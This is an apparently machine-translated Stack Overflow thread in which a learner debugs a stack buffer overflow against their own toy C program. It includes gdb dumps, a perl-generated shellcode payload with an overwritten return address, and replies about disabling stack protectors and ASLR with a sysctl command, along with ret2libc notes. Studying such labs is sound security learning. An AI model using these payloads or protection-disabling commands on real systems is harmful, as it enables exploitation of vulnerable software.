C 如何绕过返回地址覆盖而不重定向控制流?
让我在这里举例说明这个问题 这是主要的C 如何绕过返回地址覆盖而不重定向控制流?,c,gcc,assembly,stack-overflow,buffer-overflow,C,Gcc,Assembly,Stack Overflow,Buffer Overflow,让我在这里举例说明这个问题 这是主要的 (gdb) disass main Dump of assembler code for function main: 0x000000000040057c <+0>: push rbp 0x000000000040057d <+1>: mov rbp,rsp 0x0000000000400580 <+4>: sub rsp,0x40 0x0000000000400584 <
(gdb) disass main
Dump of assembler code for function main:
0x000000000040057c <+0>: push rbp
0x000000000040057d <+1>: mov rbp,rsp
0x0000000000400580 <+4>: sub rsp,0x40
0x0000000000400584 <+8>: mov DWORD PTR [rbp-0x34],edi
0x0000000000400587 <+11>: mov QWORD PTR [rbp-0x40],rsi
0x000000000040058b <+15>: mov rax,QWORD PTR [rbp-0x40]
0x000000000040058f <+19>: add rax,0x8
0x0000000000400593 <+23>: mov rdx,QWORD PTR [rax]
0x0000000000400596 <+26>: lea rax,[rbp-0x30]
0x000000000040059a <+30>: mov rsi,rdx
0x000000000040059d <+33>: mov rdi,rax
0x00000000004005a0 <+36>: call 0x400430 <strcpy@plt>
0x00000000004005a5 <+41>: mov eax,0x0
0x00000000004005aa <+46>: call 0x400566 <function>
0x00000000004005af <+51>: mov eax,0x0
0x00000000004005b4 <+56>: leave
0x00000000004005b5 <+57>: ret
End of assembler dump.
(gdb) list
#include <stdio.h>
#include <string.h>
void function(){
printf("test");
}
int main(int argc, char* argv[]) {
char a[34];
strcpy(a , argv[1]);
function();
return 0;
}
攻击者显然试图溢出数组“a”指定的缓冲区
让我们更深入地研究一下当我运行该漏洞时堆栈的外观
(gdb) run $(perl -e 'print "\xeb\x15\x59\x31\xc0\xb0\x04\x31\xdb\xff\xc3\x31\xd2\xb2\x0f\xcd\x80\xb0\x01\xff\xcb\xcd\x80\xe8\xe6\xff\xff\xff\x48\x65\x6c\x6c\x6f\x2c\x1f\x77\x6f\x72\x6c\x64\x21\x21\x21\x21\x21\x21\x21\x21\x66\x05\x40\x00\x00\x00\x00\x00"')
Starting program: /home/twister17/Documents/hacking/exploitable0 $(perl -e 'print "\xeb\x15\x59\x31\xc0\xb0\x04\x31\xdb\xff\xc3\x31\xd2\xb2\x0f\xcd\x80\xb0\x01\xff\xcb\xcd\x80\xe8\xe6\xff\xff\xff\x48\x65\x6c\x6c\x6f\x2c\x1f\x77\x6f\x72\x6c\x64\x21\x21\x21\x21\x21\x21\x21\x21\x66\x05\x40\x00\x00\x00\x00\x00"')
Breakpoint 1, main (argc=2, argv=0x7fffffffdcf8) at vulnerable_program0.c:9
9 function();
(gdb) i r rbp
rbp 0x7fffffffdc10 0x7fffffffdc10
(gdb) i r rsp
rsp 0x7fffffffdbd0 0x7fffffffdbd0
(gdb) x/18xw $rsp
0x7fffffffdbd0: 0xffffdcf8 0x00007fff 0x0040060d 0x00000002
0x7fffffffdbe0: 0x315915eb 0x3104b0c0 0x31c3ffdb 0xcd0fb2d2
0x7fffffffdbf0: 0xff01b080 0xe880cdcb 0xffffffe6 0x6c6c6548
0x7fffffffdc00: 0x771f2c6f 0x646c726f 0x21212121 0x21212121
0x7fffffffdc10: 0x00400566 0x00000000
(gdb)
受影响的缓冲区从0x7FFFFFDBE0开始,到0x7FFFFFDC10结束
外壳代码平滑地注入,为了使事情更简单,我用函数的返回地址覆盖返回地址。
也就是说,我实际上使用0x400566作为返回地址,因此如果一切顺利,它只需调用函数并打印“test”。您可以从程序集转储中清楚地看到函数“function”的地址
预期输出:“testtest”
实际输出:test(程序已经调用了该函数)。我认为您在防止缓冲区溢出的GCC的StackGuard保护方面遇到了问题 尝试使用
-fno-stack-protector
标记以禁用对程序的保护
假设您在Linux上运行它,如果您想禁用基于内核的保护(称为地址空间随机化),您可以运行:
sysctl -w kernel.randomize_va_space=0
二进制文件没有金丝雀,它显示在程序集转储中。禁用地址空间随机化没有明显的效果。地址空间随机化不是金丝雀,而是在虚拟内存中随机放置数据区域的过程。这是一个强化执行缓冲区溢出/堆溢出过程的技巧,因为它不会连续放置给定进程的堆、堆栈和库。@GabrielReyes:GDB已经对在GDB内部启动的进程禁用ASLR。您是对的,
-fstack protector
已经被禁用,或者至少没有保护这个功能,所以假设您在GDB中运行测试,这些建议都不会有什么不同。(你应该这样做,这样你就可以单步执行!)我通过更改被覆盖的地址旁边的地址来解决这个问题,因为我只是在覆盖rbp,返回地址没有改变。是什么让你认为编译器生成的代码正在检测(并静默地修复!)缓冲区溢出?请注意,strcpy
在第一个\0
处停止,因此它只复制负载末尾的一个\x00\x00\x00\x00\x00
字节。幸运的是,您仍然在上面的dword0x00400566
中得到了0
,也就是说,0x00400566
在堆栈上作为一个qword,但是您是否检查了返回地址的正确位置?最可能的情况是,您根本没有覆盖返回地址,因为程序是按编写的方式运行的。设置一个断点并使用stepi
我在意识到手头的实际问题后重新命名了标题,我对这种材料仍然非常陌生,甚至在使用了32位二进制文件后,我设法修复了它。如果你在ret
指令上设置了一个断点,你就可以很容易地看到$rsp
指向的地方。(顺便说一句,由于\0
停止strcpy
和其他基于字符串的溢出,这只会起作用,因为现有的返回地址具有与所需地址相同的高32位,并且在正确的位置有零。在返回库代码(如libc中的system()
)的情况下,会发生这样的ret2code攻击在x86-64中,由于寄存器中的零,使用有用的参数比较困难。相关:ret2reg,其中目标序列是ajmp reg
)
sysctl -w kernel.randomize_va_space=0